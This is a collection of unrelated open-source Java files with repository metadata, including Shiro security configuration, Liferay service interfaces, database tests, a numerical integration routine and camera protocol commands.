a75cac0dc6bf64e4e8b2d6e4f272db4243eac743
[]
no_license
gradle/performance-comparisons
b0d38db37c326e0ce271abebdb3c91769b860799
e53dc7182fafcf9fedf07920cbbea8b40ee4eef4
refs/heads/master
2023-08-14T19:24:39.164276
2022-11-24T05:18:33
2022-11-24T05:18:33
80,121,268
17
15
null
2022-09-30T08:04:35
2017-01-26T14:25:33
null
UTF-8
Java
false
false
305
java
package org.gradle.test.performance72_4; public class Production72_396 extends org.gradle.test.performance16_4.Production16_396 { private final String property; public Production72_396() { this.property = "foo"; } public String getProperty() { return property; } }
[ "cedric.champeau@gmail.com" ]
cedric.champeau@gmail.com
e6790d50505ccc277d2d0b5eb65744f51df0c024
d9f7839249462ab6b9298778c984ce4c6b6cbe08
/src/main/java/com/jike/certification/model/roleJurisdictionRelevance/RoleJurisdictionRelevanceInsertReq.java
17714c6de2578a5071f9d9c5fbe2f2391b66b392
[]
no_license
tanwt/TheCentralCertification
181279e120d8f09c1edf540ddaaa6c9311f23946
eaa0ac175af059ba9a4e728850a8fc1bca12d6d5
refs/heads/master
2022-06-22T01:09:29.286030
2020-06-06T03:50:27
2020-06-06T03:50:27
229,958,869
0
0
null
null
null
null
UTF-8
Java
false
false
649
java
package com.jike.certification.model.roleJurisdictionRelevance; import com.baomidou.mybatisplus.extension.activerecord.Model; import io.swagger.annotations.ApiModel; import io.swagger.annotations.ApiModelProperty; import lombok.*; /** * @author wentong * @date 2020-02-11 */ @Data @Builder @EqualsAndHashCode @NoArgsConstructor @AllArgsConstructor @ApiModel("用户权限新增请求") public class RoleJurisdictionRelevanceInsertReq extends Model<RoleJurisdictionRelevanceInsertReq> { @ApiModelProperty("用户权限关联角色id") private Long roleId; @ApiModelProperty("用户权限权限id") private Long jurisdictionId; }
[ "wentong@meituan.com" ]
wentong@meituan.com
a36fe5df557c6bea059bad86bbe3350a4c14105d
3d10141f2cf3d33a2cf7874601a9957a7328fe49
/boot-finance/src/main/java/com/boot/dubbo/finance/pay/PromoterOrderPaySuccess.java
f4bb31825d0e599002094a3bd054da443899c398
[]
no_license
lukw510903926/springboot-dubbo
dbd6367c131fce30585bd719cbab5adf9a39d68f
1550ad32aa92d28ebdfd560dcc21f3dd04550b39
refs/heads/master
2022-12-03T18:26:32.876911
2020-04-23T13:11:00
2020-04-23T13:11:00
154,239,755
2
2
null
2022-06-17T02:00:52
2018-10-23T01:11:01
Java
UTF-8
Java
false
false
837
java
package com.boot.dubbo.finance.pay; import com.boot.dubbo.finance.constants.OrderHandlerEnum; import com.boot.dubbo.finance.dto.UserOrderDTO; /** * @author : yangqi * @email : lukewei@mockuai.com * @description : * @since : 2020-01-12 18:22 */ public class PromoterOrderPaySuccess extends AbstractOrderPaySuccessHandler { @Override public void handleOrderPaySuccess(UserOrderDTO userOrderDTO) { super.handleOrderPaySuccess(userOrderDTO); } @Override public void handleSeller(UserOrderDTO userOrderDTO) { super.handleSeller(userOrderDTO); } @Override public void handleDistribution(UserOrderDTO userOrderDTO) { super.handleDistribution(userOrderDTO); } @Override public String getHandlerName() { return OrderHandlerEnum.PROMOTER_ORDER.name(); } }
[ "lkw510903926@163.com" ]
lkw510903926@163.com
3b98f879b1f585b0a9bf32365684126c22849b51
51a3fc28890dfb08d05dbb30afb1c15df7b9fd7e
/systests/single_bundle_distro_rest/src/test/java/org/apache/cxf/dosgi/systests/singlebundle/BasicPublishHookTest.java
b9a91fa725fb12d396c36de49378de2aa511786a
[]
no_license
bosschaert/cxf-dosgi
d7b772129dd4aef8b670a38da31fe5dd1f5f1690
2e0e7194eb0e6ce3706c217d474013b85d6d9016
refs/heads/trunk
2021-01-18T13:51:16.082993
2012-07-07T19:40:30
2012-07-07T19:40:30
4,940,600
0
0
null
2020-10-13T06:47:37
2012-07-07T19:31:09
Java
UTF-8
Java
false
false
1,314
java
/** * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.cxf.dosgi.systests.singlebundle; import java.io.File; import org.apache.cxf.dosgi.systests.common.rest.AbstractJaxRsPublishHookTest; public class BasicPublishHookTest extends AbstractJaxRsPublishHookTest { protected File [] getDistributionBundles() throws Exception { return SingleBundleDistributionResolver.getDistribution(); } public void testBasicInvocation() throws Exception { super.testBasicInvocation(); } }
[ "sergeyb@apache.org" ]
sergeyb@apache.org
e6a89eab8ce260fde7c8033c57d4b57f7a8541f4
347e23227eb668a34f92dd1e895e0a33b2dff396
/com/remoteyourcam/usb/ptp/commands/GetObjectInfoCommand.java
98699a47b82fbbf35611d6332118a95969c4bf96
[]
no_license
yarshure/dslr
41d878b5a9473d902238e690ca8758bee164643e
904a6587216075b5b9f5b2b77bae41475527ae4d
refs/heads/master
2021-04-15T14:47:19.625428
2018-03-26T08:25:10
2018-03-26T08:25:10
126,797,057
3
4
null
null
null
null
UTF-8
Java
false
false
1,387
java
package com.remoteyourcam.usb.ptp.commands; import com.remoteyourcam.usb.ptp.PtpCamera; import com.remoteyourcam.usb.ptp.PtpCamera.IO; import com.remoteyourcam.usb.ptp.PtpConstants.Operation; import com.remoteyourcam.usb.ptp.PtpConstants.Response; import com.remoteyourcam.usb.ptp.model.ObjectInfo; import java.nio.ByteBuffer; public class GetObjectInfoCommand extends Command { private final String TAG = GetObjectInfoCommand.class.getSimpleName(); private ObjectInfo inObjectInfo; private final int outObjectHandle; public GetObjectInfoCommand(PtpCamera ptpCamera, int i) { super(ptpCamera); this.outObjectHandle = i; } protected void decodeData(ByteBuffer byteBuffer, int i) { this.inObjectInfo = new ObjectInfo(byteBuffer, i); } public void encodeCommand(ByteBuffer byteBuffer) { encodeCommand(byteBuffer, Operation.GetObjectInfo, this.outObjectHandle); } public void exec(IO io) { io.handleCommand(this); if (this.responseCode == Response.DeviceBusy) { this.camera.onDeviceBusy(this, true); } if (this.inObjectInfo == null) { } } public ObjectInfo getObjectInfo() { return this.inObjectInfo; } public void reset() { super.reset(); this.inObjectInfo = null; } }
[ "dev@abigt.net" ]
dev@abigt.net
5ef5416baf20e600900c720eae178ddb6098c0a2
0fcc7037a17adcb9035947657f1cda53c0e5f265
/src/metodos/Simpson3_8.java
c361e4b60d7955ff8d526807810d6abbcaa12ed6
[ "MIT" ]
permissive
LuisEduardoRamos/MetodosNumericosParaIng
a3981c1bba34f88d86376a86d5eeeeb14d30aedd
ba4c78b985f0d5c13ccdfdb9f968e9d3ebf459bf
refs/heads/master
2022-03-29T20:35:45.010304
2019-12-19T12:38:34
2019-12-19T12:38:34
null
0
0
null
null
null
null
UTF-8
Java
false
false
1,763
java
package metodos; import consola.Consola; import funcion.*; public class Simpson3_8 extends Base { public Simpson3_8() { this.espaciado = 0; this.decimales = 10; } public double evaluar(Funcion funcion, double x0, double x1, double x2, double x3) { System.out.println("x0: " + x0); System.out.println("x1: " + x1); System.out.println("x2: " + x2); System.out.println("x3: " + x3); System.out.println(); double resultado = 0; resultado += funcion.evaluar(x0); double partes = 0; partes += 3 * funcion.evaluar(x1); partes += 3 * funcion.evaluar(x2); resultado += partes; resultado += funcion.evaluar(x3); resultado /= 8; resultado *= (x3 - x0); System.out.println(""); System.out.println("Resultado:"); System.out.println(this.redondear(resultado)); return resultado; } public void consola() { Consola consola = new Consola(); String funcion_cadena = consola.getCadena("Ingresa la Funcion"); double x0 = consola.getNumero("Ingresa el Valor para X0"); double x1 = consola.getNumero("Ingresa el Valor para X1"); double x2 = consola.getNumero("Ingresa el Valor para X2"); double x3 = consola.getNumero("Ingresa el Valor para X3"); boolean fraccion = consola.getBoolean("Quieres usar Fraccciones?"); int decimales = consola.getEntero("cuantos decimales queres usar para el reporte?", 6); this.fraccion = fraccion; this.decimales = decimales; consola.limpiarPantalla(); Funcion funcion = new Funcion(funcion_cadena); this.evaluar(funcion, x0, x1, x2, x3); } }
[ "jeral17@gmail.com" ]
jeral17@gmail.com
56cce971708cc1ee1debfa98158702ed612e01ef
5aa2abcc1d260eb435254e8a1ed12c2af18d4ab4
/shiro/src/main/java/shiro/config/ShiroConfig.java
5f819ba254b4213179d2ed6ffddfc6075d333f48
[]
no_license
everythinggood/spring-boot-demo
4664a28364b8904681d9936ad4e3e2b27a4db615
b73b4b8fdcf884c95a00e3d20944464656aa1f69
refs/heads/master
2022-10-30T00:21:40.563020
2020-07-02T02:46:53
2020-07-02T02:46:53
249,932,130
0
0
null
2022-07-06T20:48:08
2020-03-25T09:06:28
Java
UTF-8
Java
false
false
3,725
java
package shiro.config; import org.apache.shiro.authc.credential.HashedCredentialsMatcher; import org.apache.shiro.spring.security.interceptor.AuthorizationAttributeSourceAdvisor; import org.apache.shiro.spring.web.ShiroFilterFactoryBean; import org.apache.shiro.web.mgt.DefaultWebSecurityManager; import org.springframework.context.annotation.Bean; import org.springframework.context.annotation.Configuration; import org.springframework.web.servlet.handler.SimpleMappingExceptionResolver; import java.util.HashMap; import java.util.Map; import java.util.Properties; @Configuration public class ShiroConfig { //将自己的验证方式加入容器 @Bean MyShiroRealm myShiroRealm() { MyShiroRealm myShiroRealm = new MyShiroRealm(); myShiroRealm.setCredentialsMatcher(hashedCredentialsMatcher()); return myShiroRealm; } //权限管理,配置主要是Realm的管理认证 @Bean DefaultWebSecurityManager securityManager() { DefaultWebSecurityManager manager = new DefaultWebSecurityManager(); manager.setRealm(myShiroRealm()); return manager; } //凭证匹配器(密码校验交给Shiro的SimpleAuthenticationInfo进行处理) @Bean public HashedCredentialsMatcher hashedCredentialsMatcher(){ HashedCredentialsMatcher hashedCredentialsMatcher = new HashedCredentialsMatcher(); hashedCredentialsMatcher.setHashAlgorithmName("md5");//散列算法:这里使用MD5算法; hashedCredentialsMatcher.setHashIterations(2);//散列的次数,比如散列两次,相当于 md5(md5("")); return hashedCredentialsMatcher; } // Filter工厂,设置对应的过滤条件和跳转条件 @Bean ShiroFilterFactoryBean shiroFilterFactoryBean() { ShiroFilterFactoryBean bean = new ShiroFilterFactoryBean(); bean.setSecurityManager(securityManager()); Map<String, String> filterMap = new HashMap<String, String>(); // 登出 filterMap.put("/logout", "logout"); // swagger filterMap.put("/swagger**/**", "anon"); filterMap.put("/webjars/**", "anon"); filterMap.put("/v2/**", "anon"); // 对所有用户认证 filterMap.put("/**", "authc"); // 登录 bean.setLoginUrl("/login"); // 首页 bean.setSuccessUrl("/index"); // 未授权页面,认证不通过跳转 bean.setUnauthorizedUrl("/403"); bean.setFilterChainDefinitionMap(filterMap); return bean; } //开启shiro aop注解支持. @Bean public AuthorizationAttributeSourceAdvisor authorizationAttributeSourceAdvisor(){ AuthorizationAttributeSourceAdvisor authorizationAttributeSourceAdvisor = new AuthorizationAttributeSourceAdvisor(); authorizationAttributeSourceAdvisor.setSecurityManager(securityManager()); return authorizationAttributeSourceAdvisor; } //shiro注解模式下,登录失败或者是没有权限都是抛出异常,并且默认的没有对异常做处理,配置一个异常处理 @Bean(name="simpleMappingExceptionResolver") public SimpleMappingExceptionResolver createSimpleMappingExceptionResolver() { SimpleMappingExceptionResolver r = new SimpleMappingExceptionResolver(); Properties mappings = new Properties(); mappings.setProperty("DatabaseException", "databaseError");//数据库异常处理 mappings.setProperty("UnauthorizedException","/403"); r.setExceptionMappings(mappings); // None by default r.setDefaultErrorView("error"); // No default r.setExceptionAttribute("exception"); // Default is "exception" return r; } }
[ "yanchiyi" ]
yanchiyi
e7c009fe20219a19220ff6e0b43917bd7933aa89
e8d4f4a3c7289ec3b64defe8ee6cc0faf2d89ff0
/src/test/java/net/kotek/jdbm/DBMakerTest.java
b664ebb35cc2a90edfaa36fc7a7d66035f62af94
[ "LicenseRef-scancode-warranty-disclaimer", "Apache-2.0", "LicenseRef-scancode-unknown-license-reference" ]
permissive
berlinguyinca/JDBM3
79414664fd4f909370b5d983a2642ecdd494b441
3cf12899ef73a6c828f3b0ad5ee4613ecd132a2f
refs/heads/master
2021-01-16T18:08:27.400174
2012-03-27T22:24:12
2012-03-27T22:24:12
null
0
0
null
null
null
null
UTF-8
Java
false
false
1,789
java
package net.kotek.jdbm; import java.io.IOException; import java.util.Set; public class DBMakerTest extends TestCaseWithTestFile { public void testMemory() throws IOException { DBStore db = (DBStore) new DBMaker(null) .disableCache() .build(); long recid = db.insert("aaa"); db.commit(); db.update(recid,"bbb"); db.rollback(); assertEquals("aaa",db.fetch(recid)); db.close(); db = (DBStore) new DBMaker(null) .disableCache() .build(); //this will fail if 'test' already exists try{ db.fetch(recid); fail("record should not exist"); }catch(Throwable e){ //ignore } } public void testDisk() throws IOException { DBStore db = (DBStore) new DBMaker(newTestFile()) .disableCache() .build(); long recid = db.insert("aaa"); db.commit(); db.update(recid,"bbb"); db.rollback(); assertEquals("aaa",db.fetch(recid)); db.close(); } public void testEncrypt(){ String file = newTestFile(); DB db = new DBMaker(file) .enableEncryption("password",false) .build(); Set l = db.createHashSet("test"); for(int i = 0;i<10000;i++){ l.add("aa"+i); } db.commit(); db.close(); db = new DBMaker(file) .enableEncryption("password",false) .build(); l = db.getHashSet("test"); for(int i = 0;i<10000;i++){ assertTrue(l.contains("aa"+i)); } db.close(); } }
[ "jan@artemis.(none)" ]
jan@artemis.(none)
762eb707e3acaddfed06bdb718b6f4b410539edd
d68fb377a9233d3312d091220bcde4e6276977be
/components/core/src/main/java/org/thenesis/midpath/sound/codec/AudioDecoder.java
8e47f323123a6ea94e7233c45bcc4fcbb569468d
[]
no_license
jbanes/midpath
40e0eec7cf4d27a2f36b7cc5bff0b8227048bda8
6850d6fa9cce06eecfec4bc2e8af4903dbb55e21
refs/heads/master
2022-12-22T17:12:54.546128
2020-09-18T11:59:19
2020-09-18T11:59:19
295,056,791
4
1
null
null
null
null
UTF-8
Java
false
false
1,142
java
/* * MIDPath - Copyright (C) 2006-2008 Guillaume Legris, Mathieu Legris * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License version * 2 only, as published by the Free Software Foundation. * * This program is distributed in the hope that it will be useful, but * WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * General Public License version 2 for more details. * * You should have received a copy of the GNU General Public License * version 2 along with this work; if not, write to the Free Software * Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA * 02110-1301 USA */ package org.thenesis.midpath.sound.codec; import java.io.IOException; import java.io.InputStream; import org.thenesis.midpath.sound.AudioFormat; public interface AudioDecoder { public void initialize(InputStream is) throws IOException; public int decodeStep(DecoderCallback os) throws IOException; public AudioFormat getOutputAudioFormat(); }
[ "jbanes@gmail.com" ]
jbanes@gmail.com
aa26b08ff73a8778ec2e3e1b915c97da084150dd
1a7abe168a09504fad1324f7e8b716be61c02897
/solutions/solutions-chapter-06/solution-06-gradebook/solution-06-gradebook-api/src/main/java/com/liferay/training/gradebook/service/SubmissionLocalService.java
b6f485f70a145ee5330bcb653364f2a0f6f01484
[]
no_license
deivisondfs2/liferay-treinamento-back
893657220295f2498d406e523f19f5c946af13e1
1a3389d5e78c8007a5144ef1215ac2ce578927a1
refs/heads/master
2020-04-02T06:14:23.480917
2018-10-26T12:39:28
2018-10-26T12:39:28
154,137,477
0
0
null
null
null
null
UTF-8
Java
false
false
13,187
java
/** * Copyright (c) 2000-present Liferay, Inc. All rights reserved. * * This library is free software; you can redistribute it and/or modify it under * the terms of the GNU Lesser General Public License as published by the Free * Software Foundation; either version 2.1 of the License, or (at your option) * any later version. * * This library is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS * FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more * details. */ package com.liferay.training.gradebook.service; import aQute.bnd.annotation.ProviderType; import com.liferay.portal.kernel.dao.orm.ActionableDynamicQuery; import com.liferay.portal.kernel.dao.orm.DynamicQuery; import com.liferay.portal.kernel.dao.orm.IndexableActionableDynamicQuery; import com.liferay.portal.kernel.dao.orm.Projection; import com.liferay.portal.kernel.exception.PortalException; import com.liferay.portal.kernel.exception.SystemException; import com.liferay.portal.kernel.model.PersistedModel; import com.liferay.portal.kernel.search.Indexable; import com.liferay.portal.kernel.search.IndexableType; import com.liferay.portal.kernel.service.BaseLocalService; import com.liferay.portal.kernel.service.PersistedModelLocalService; import com.liferay.portal.kernel.service.ServiceContext; import com.liferay.portal.kernel.transaction.Isolation; import com.liferay.portal.kernel.transaction.Propagation; import com.liferay.portal.kernel.transaction.Transactional; import com.liferay.portal.kernel.util.OrderByComparator; import com.liferay.training.gradebook.model.Submission; import java.io.Serializable; import java.util.List; /** * Provides the local service interface for Submission. Methods of this * service will not have security checks based on the propagated JAAS * credentials because this service can only be accessed from within the same * VM. * * @author Brian Wing Shun Chan * @see SubmissionLocalServiceUtil * @see com.liferay.training.gradebook.service.base.SubmissionLocalServiceBaseImpl * @see com.liferay.training.gradebook.service.impl.SubmissionLocalServiceImpl * @generated */ @ProviderType @Transactional(isolation = Isolation.PORTAL, rollbackFor = { PortalException.class, SystemException.class}) public interface SubmissionLocalService extends BaseLocalService, PersistedModelLocalService { /* * NOTE FOR DEVELOPERS: * * Never modify or reference this interface directly. Always use {@link SubmissionLocalServiceUtil} to access the submission local service. Add custom service methods to {@link com.liferay.training.gradebook.service.impl.SubmissionLocalServiceImpl} and rerun ServiceBuilder to automatically copy the method declarations to this interface. */ /** * Adds a new submissions * * @param assignmentId * @param studentId * @param submissionText * @param serviceContext * @return * @throws PortalException */ public Submission addSubmission(long assignmentId, long studentId, java.lang.String submissionText, ServiceContext serviceContext) throws PortalException; /** * Adds the submission to the database. Also notifies the appropriate model listeners. * * @param submission the submission * @return the submission that was added */ @Indexable(type = IndexableType.REINDEX) public Submission addSubmission(Submission submission); /** * Creates a new submission with the primary key. Does not add the submission to the database. * * @param submissionId the primary key for the new submission * @return the new submission */ public Submission createSubmission(long submissionId); /** * @throws PortalException */ @Override public PersistedModel deletePersistedModel(PersistedModel persistedModel) throws PortalException; /** * Deletes the submission with the primary key from the database. Also notifies the appropriate model listeners. * * @param submissionId the primary key of the submission * @return the submission that was removed * @throws PortalException if a submission with the primary key could not be found */ @Indexable(type = IndexableType.DELETE) public Submission deleteSubmission(long submissionId) throws PortalException; /** * Deletes the submission from the database. Also notifies the appropriate model listeners. * * @param submission the submission * @return the submission that was removed */ @Indexable(type = IndexableType.DELETE) public Submission deleteSubmission(Submission submission); public DynamicQuery dynamicQuery(); /** * Performs a dynamic query on the database and returns the matching rows. * * @param dynamicQuery the dynamic query * @return the matching rows */ public <T> List<T> dynamicQuery(DynamicQuery dynamicQuery); /** * Performs a dynamic query on the database and returns a range of the matching rows. * * <p> * Useful when paginating results. Returns a maximum of <code>end - start</code> instances. <code>start</code> and <code>end</code> are not primary keys, they are indexes in the result set. Thus, <code>0</code> refers to the first result in the set. Setting both <code>start</code> and <code>end</code> to {@link com.liferay.portal.kernel.dao.orm.QueryUtil#ALL_POS} will return the full result set. If <code>orderByComparator</code> is specified, then the query will include the given ORDER BY logic. If <code>orderByComparator</code> is absent and pagination is required (<code>start</code> and <code>end</code> are not {@link com.liferay.portal.kernel.dao.orm.QueryUtil#ALL_POS}), then the query will include the default ORDER BY logic from {@link com.liferay.training.gradebook.model.impl.SubmissionModelImpl}. If both <code>orderByComparator</code> and pagination are absent, for performance reasons, the query will not have an ORDER BY clause and the returned result set will be sorted on by the primary key in an ascending order. * </p> * * @param dynamicQuery the dynamic query * @param start the lower bound of the range of model instances * @param end the upper bound of the range of model instances (not inclusive) * @return the range of matching rows */ public <T> List<T> dynamicQuery(DynamicQuery dynamicQuery, int start, int end); /** * Performs a dynamic query on the database and returns an ordered range of the matching rows. * * <p> * Useful when paginating results. Returns a maximum of <code>end - start</code> instances. <code>start</code> and <code>end</code> are not primary keys, they are indexes in the result set. Thus, <code>0</code> refers to the first result in the set. Setting both <code>start</code> and <code>end</code> to {@link com.liferay.portal.kernel.dao.orm.QueryUtil#ALL_POS} will return the full result set. If <code>orderByComparator</code> is specified, then the query will include the given ORDER BY logic. If <code>orderByComparator</code> is absent and pagination is required (<code>start</code> and <code>end</code> are not {@link com.liferay.portal.kernel.dao.orm.QueryUtil#ALL_POS}), then the query will include the default ORDER BY logic from {@link com.liferay.training.gradebook.model.impl.SubmissionModelImpl}. If both <code>orderByComparator</code> and pagination are absent, for performance reasons, the query will not have an ORDER BY clause and the returned result set will be sorted on by the primary key in an ascending order. * </p> * * @param dynamicQuery the dynamic query * @param start the lower bound of the range of model instances * @param end the upper bound of the range of model instances (not inclusive) * @param orderByComparator the comparator to order the results by (optionally <code>null</code>) * @return the ordered range of matching rows */ public <T> List<T> dynamicQuery(DynamicQuery dynamicQuery, int start, int end, OrderByComparator<T> orderByComparator); /** * Returns the number of rows matching the dynamic query. * * @param dynamicQuery the dynamic query * @return the number of rows matching the dynamic query */ public long dynamicQueryCount(DynamicQuery dynamicQuery); /** * Returns the number of rows matching the dynamic query. * * @param dynamicQuery the dynamic query * @param projection the projection to apply to the query * @return the number of rows matching the dynamic query */ public long dynamicQueryCount(DynamicQuery dynamicQuery, Projection projection); @Transactional(propagation = Propagation.SUPPORTS, readOnly = true) public Submission fetchSubmission(long submissionId); @Transactional(propagation = Propagation.SUPPORTS, readOnly = true) public ActionableDynamicQuery getActionableDynamicQuery(); @Transactional(propagation = Propagation.SUPPORTS, readOnly = true) public IndexableActionableDynamicQuery getIndexableActionableDynamicQuery(); /** * Returns the OSGi service identifier. * * @return the OSGi service identifier */ public java.lang.String getOSGiServiceIdentifier(); @Override @Transactional(propagation = Propagation.SUPPORTS, readOnly = true) public PersistedModel getPersistedModel(Serializable primaryKeyObj) throws PortalException; /** * Returns the submission with the primary key. * * @param submissionId the primary key of the submission * @return the submission * @throws PortalException if a submission with the primary key could not be found */ @Transactional(propagation = Propagation.SUPPORTS, readOnly = true) public Submission getSubmission(long submissionId) throws PortalException; /** * Returns a range of all the submissions. * * <p> * Useful when paginating results. Returns a maximum of <code>end - start</code> instances. <code>start</code> and <code>end</code> are not primary keys, they are indexes in the result set. Thus, <code>0</code> refers to the first result in the set. Setting both <code>start</code> and <code>end</code> to {@link com.liferay.portal.kernel.dao.orm.QueryUtil#ALL_POS} will return the full result set. If <code>orderByComparator</code> is specified, then the query will include the given ORDER BY logic. If <code>orderByComparator</code> is absent and pagination is required (<code>start</code> and <code>end</code> are not {@link com.liferay.portal.kernel.dao.orm.QueryUtil#ALL_POS}), then the query will include the default ORDER BY logic from {@link com.liferay.training.gradebook.model.impl.SubmissionModelImpl}. If both <code>orderByComparator</code> and pagination are absent, for performance reasons, the query will not have an ORDER BY clause and the returned result set will be sorted on by the primary key in an ascending order. * </p> * * @param start the lower bound of the range of submissions * @param end the upper bound of the range of submissions (not inclusive) * @return the range of submissions */ @Transactional(propagation = Propagation.SUPPORTS, readOnly = true) public List<Submission> getSubmissions(int start, int end); @Transactional(propagation = Propagation.SUPPORTS, readOnly = true) public List<Submission> getSubmissionsByAssignment(long groupId, long assignmentId); @Transactional(propagation = Propagation.SUPPORTS, readOnly = true) public List<Submission> getSubmissionsByAssignment(long groupId, long assignmentId, int start, int end); /** * Gets submissions by keywords. * * This example uses dynamic queries. * * @param groupId * @param assignmentId * @param keywords * @param start * @param end * @param orderByComparator * @return */ @Transactional(propagation = Propagation.SUPPORTS, readOnly = true) public List<Submission> getSubmissionsByKeywords(long groupId, long assignmentId, java.lang.String keywords, int start, int end, OrderByComparator<Submission> orderByComparator); /** * Returns the number of submissions. * * @return the number of submissions */ @Transactional(propagation = Propagation.SUPPORTS, readOnly = true) public int getSubmissionsCount(); @Transactional(propagation = Propagation.SUPPORTS, readOnly = true) public int getSubmissionsCountByAssignment(long groupId, long assignmentId); @Transactional(propagation = Propagation.SUPPORTS, readOnly = true) public long getSubmissionsCountByKeywords(long groupId, long assignmentId, java.lang.String keywords); public Submission gradeAndCommentSubmission(long submissionId, int grade, java.lang.String comment) throws PortalException; /** * Grades submission. * * @param submissionId * @param grade * @return * @throws PortalException */ public Submission gradeSubmission(long submissionId, int grade) throws PortalException; /** * Updates submission. * * @param submissionId * @param submissionText * @param serviceContext * @return * @throws PortalException */ public Submission updateSubmission(long submissionId, java.lang.String submissionText, ServiceContext serviceContext) throws PortalException; /** * Updates the submission in the database or adds it if it does not yet exist. Also notifies the appropriate model listeners. * * @param submission the submission * @return the submission that was updated */ @Indexable(type = IndexableType.REINDEX) public Submission updateSubmission(Submission submission); }
[ "deivison.francisco@pitang.com" ]
deivison.francisco@pitang.com
cb7f017d30b0a6afc58d00fc32ed83f60b5867a1
922746e28e43f54a086d1cdcff2cfe426b173dd7
/wang/src/main/java/com/jc/system/portal/domain/Portal.java
63301f3d0693fd23174dd008d27cda26b3cb912d
[]
no_license
wtfc/springboot-shyt
f934161c6cdf37ba99515257ffba7f8d50822b5c
1b67918f7a129ffef16ca61be0738c241029866f
refs/heads/master
2020-04-09T05:24:39.017913
2018-12-02T17:42:27
2018-12-02T17:42:27
160,063,362
0
0
null
null
null
null
UTF-8
Java
false
false
2,458
java
package com.jc.system.portal.domain; import com.jc.foundation.domain.BaseBean; import com.jc.system.dic.IDicManager; import com.jc.system.dic.impl.DicManagerImpl; /** * @title GOA2.0 * @description 实体类 * @author * @version 2014-06-13 */ public class Portal extends BaseBean{ private static final long serialVersionUID = 1L; private String portalName; /*门户名称*/ private String portalStatus; /*门户状态portalstatus_2-禁用portalstatus_1-启用*/ private Long portalmenuId; /**/ private Integer sequence; /*排序号*/ private String portalType; /*门户类型 ptype_org 机构 ptype_dept 部门 ptype_user 个人*/ private Long roleId; /*角色ID*/ private Long deptId; /*部门ID*/ private Long userId; /**/ private Long organId; /**/ private String roleIds; /*角色IDS*/ public String getPortalName(){ return portalName; } public void setPortalName(String portalName){ this.portalName = portalName; } public String getPortalStatus(){ return portalStatus; } public void setPortalStatus(String portalStatus){ this.portalStatus = portalStatus; } public String getPortalStatusValue(){ IDicManager dicManager = new DicManagerImpl(); return dicManager.getDic("portal_status", portalStatus).getValue(); } public Long getPortalmenuId(){ return portalmenuId; } public void setPortalmenuId(Long portalmenuId){ this.portalmenuId = portalmenuId; } public Integer getSequence(){ return sequence; } public void setSequence(Integer sequence){ this.sequence = sequence; } public String getPortalType() { return portalType; } public void setPortalType(String portalType) { this.portalType = portalType; } public String getPortalTypeValue(){ IDicManager dicManager = new DicManagerImpl(); return dicManager.getDic("portal_type", portalType).getValue(); } public Long getRoleId() { return roleId; } public void setRoleId(Long roleId) { this.roleId = roleId; } public Long getDeptId() { return deptId; } public void setDeptId(Long deptId) { this.deptId = deptId; } public Long getUserId() { return userId; } public void setUserId(Long userId) { this.userId = userId; } public Long getOrganId() { return organId; } public void setOrganId(Long organId) { this.organId = organId; } public String getRoleIds() { return roleIds; } public void setRoleIds(String roleIds) { this.roleIds = roleIds; } }
[ "1226105567@qq.com" ]
1226105567@qq.com
d54269569ab9b3037e2a29aa842d5c6104ba4045
7a0c1b9cc078ba129438fe916a174d5a60b9a178
/guvnor-ala/guvnor-ala-spi/src/main/java/org/guvnor/ala/pipeline/events/PipelineEventListener.java
62b6420576f00327a43b33252782cacfc278af3b
[ "Apache-2.0" ]
permissive
wmedvede/guvnor
055cb4c7647ca02f8c0a719ea9997ddad263087e
ce1e9cb7a99e0c129b18932d914347d32955c327
refs/heads/master
2021-01-15T11:38:41.315703
2017-04-19T15:40:33
2017-04-19T15:40:33
38,826,828
0
1
null
2015-07-09T14:54:13
2015-07-09T14:54:13
null
UTF-8
Java
false
false
1,742
java
/* * Copyright 2016 Red Hat, Inc. and/or its affiliates. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.guvnor.ala.pipeline.events; /* * Pipeline Event Listener covering all the pipeline stages and errors. * You can provide and attach different implementations to use as hook points * to trigger custom code. */ public interface PipelineEventListener { /* * Event emmited before executing the pipeline */ void beforePipelineExecution( final BeforePipelineExecutionEvent bpee ); /* * Event emmited after the pipeline execution finish */ void afterPipelineExecution( final AfterPipelineExecutionEvent apee ); /* * Event emmited before each pipeline stage execution */ void beforeStageExecution( final BeforeStageExecutionEvent bsee ); /* * Event emmited on an error inside a pipeline stage */ void onStageError( final OnErrorStageExecutionEvent oesee ); /* * Event emmited after each pipeline stage execution */ void afterStageExecution( final AfterStageExecutionEvent asee ); /* * Event emmited on an error inside the pipeline */ void onPipelineError( final OnErrorPipelineExecutionEvent oepee ); }
[ "alexandre.porcelli@gmail.com" ]
alexandre.porcelli@gmail.com
a8c4f3170363a294c446d7a93d97eb61b1d1a910
581a7edc7719c5fc563b3f249eb894ffd05c50ae
/src/test/java/com/digitalacademy/loan/controller/LoanControllerTest.java
2da7b6a335d62da2bfe3e7d713b32a634a19a239
[]
no_license
pornpitcha12/Loan-Un
59f86cc803e98b37bf49f7cbb8dba2656babc049
8471476877d3ff62a03bec2a35daa51b37be5dd1
refs/heads/main
2023-01-27T18:47:49.336296
2020-12-03T04:24:05
2020-12-03T04:24:05
null
0
0
null
null
null
null
UTF-8
Java
false
false
4,991
java
